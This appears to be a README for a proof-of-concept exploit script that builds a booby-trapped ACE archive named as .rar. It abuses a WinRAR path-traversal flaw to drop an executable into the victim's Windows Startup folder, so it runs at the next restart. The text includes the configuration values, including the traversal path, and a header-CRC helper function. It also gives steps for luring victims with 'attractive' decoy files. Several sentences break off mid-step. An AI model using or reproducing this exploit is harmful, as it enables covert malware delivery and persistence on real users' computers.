poc by Ridter
how to use ?
you just need to install python 3.7, and prepare a evil file you want to run, set the values you want, this exp script will generate the evil archive file automatically!
- set the values you want
... ... # The archive filename you want rar_filename = "test.rar" # The evil file you want to run evil_filename = "calc.exe" # The decompression path you want, such shown below target_filename = r"C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hi.exe" # Other files to be displayed when the victim opens the winrar # filename_list= filename_list = ["hello.txt", "world.txt"] ... ... def get_right_hdr_crc(filename): # This command may be different, it depends on the your Python3 environment. p = os.popen('py -3 acefile.py --headers %s'%(filename)) res = p.read() pattern = re.compile('right_hdr_crc : 0x(.*?) | struct') result = pattern.findall(res) right_hdr_crc = result.upper() return hex2raw4(right_hdr_crc) ... ...
- run the exp, exp generated the
- if the victim opens the
test.rar, he will see the file
world.txt, you can also add more files, more attractive files.
- when he unpacks the file, the victim's user startup directory will have one more file named
hi.exe, actually it's a
calc.exe. when he restart the computer, the
have fun! :)